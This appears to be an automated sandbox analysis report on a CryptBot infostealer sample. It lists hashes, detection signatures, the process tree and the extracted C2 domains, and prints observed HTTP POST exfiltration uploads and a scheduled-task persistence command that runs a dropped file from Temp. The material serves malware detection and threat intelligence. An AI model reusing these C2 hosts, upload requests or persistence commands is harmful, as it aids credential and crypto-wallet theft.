Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532996
MD5:	7105a2ba8c897b6c2072a6ab0bdecdf1
SHA1:	d3659027483c2825c8430a41a0c3e439aac78e2f
SHA256:	abc53ac9f7564ceba0a7548b880b1e92c8e0329ff9680e3c5f06abcbd4e869b9
Tags:	exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7105A2BA8C897B6C2072A6AB0BDECDF1)

service123.exe (PID: 8016 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: C7DE705DEE7C918329739835EB2FFF15)

schtasks.exe (PID: 8040 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 8100 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: C7DE705DEE7C918329739835EB2FFF15)

service123.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: C7DE705DEE7C918329739835EB2FFF15)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["analforeverlovyu.top", "pn.top", "n.top", "0asevtbv17pn.top", "+sevtbv17pn.top", "@sevtbv17pn.top", "sevtbv17pn.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2351645168.0000000004495000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7432	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7432	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 8016	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.service123.exe.6c2f0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 8040, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:15:10.390655+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49730	80.66.81.78	80	TCP
2024-10-14T09:15:14.041830+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49731	80.66.81.78	80	TCP
2024-10-14T09:15:19.548678+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49734	80.66.81.78	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: file.exe.7432.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "pn.top", "n.top", "0asevtbv17pn.top", "+sevtbv17pn.top", "@sevtbv17pn.top", "sevtbv17pn.top"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_005315B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_005315B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_6C2F14B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	4_2_005381E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36AC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C392EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C30AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C3CF960h	4_2_6C30E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C31E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C31E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C3104F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	4_2_6C3904E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C310610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C31A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C31A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C31A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C310010
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C3CD014h]	4_2_6C3C4110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C314203
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C398250
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C31C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C31A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C31A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C31A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36BDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36BF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	4_2_6C349F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C3A9900
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C32B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C32B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36BAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C367AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	4_2_6C31D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C3CDFF4h	4_2_6C363440
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	4_2_6C31D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C3635F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	4_2_6C31D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C31D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C387100
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C31D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C36B280
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_6C3693B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 80.66.81.78:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 80.66.81.78:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49734 -> 80.66.81.78:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: pn.top
Source: Malware configuration extractor	URLs: n.top
Source: Malware configuration extractor	URLs: 0asevtbv17pn.top
Source: Malware configuration extractor	URLs: +sevtbv17pn.top
Source: Malware configuration extractor	URLs: @sevtbv17pn.top
Source: Malware configuration extractor	URLs: sevtbv17pn.top

Source: Joe Sandbox View

ASN Name: TEAM-HOSTASRU TEAM-HOSTASRU

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70837388User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbv17pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary12658505User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89281Host: sevtbv17pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary60576727User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 31924Host: sevtbv17pn.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sevtbv17pn.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70837388User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: sevtbv17pn.top

Source: file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbv17pn.top/
Source: file.exe, 00000000.00000003.1859870408.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtbv17pn.top/v1/upload.php
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TMdMlTZMAWbrEijBRYMr.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe	String found in binary or memory: https://keruzam.com/update.php?compName
Source: file.exe, 00000000.00000003.2374347014.000000006A364000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keruzam.com/update.php?compName=
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1824507467.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C309B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

4_2_6C309B99

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C309B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

4_2_6C309B99

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\file.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_005351B0	4_2_005351B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00533E20	4_2_00533E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FCD00	4_2_6C2FCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FEE50	4_2_6C2FEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3B4E80	4_2_6C3B4E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C300FC0	4_2_6C300FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C340870	4_2_6C340870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C332A7E	4_2_6C332A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C334490	4_2_6C334490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3044F0	4_2_6C3044F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C328570	4_2_6C328570
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C330580	4_2_6C330580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C322110	4_2_6C322110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33FE10	4_2_6C33FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C331E40	4_2_6C331E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C305880	4_2_6C305880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33D99E	4_2_6C33D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C34DA20	4_2_6C34DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C31F510	4_2_6C31F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3296A0	4_2_6C3296A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3377D0	4_2_6C3377D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F3000	4_2_6C2F3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3070C0	4_2_6C3070C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3311BE	4_2_6C3311BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3412C0	4_2_6C3412C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C33F3C0	4_2_6C33F3C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3BAB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C3490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C3310 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3C38D0 appears 38 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\AWxXIdIDvb

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\uoijNYchjvFkhpkdArrg
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1824507467.0000000001C34000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: tmdmltzmawbreijbrymr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
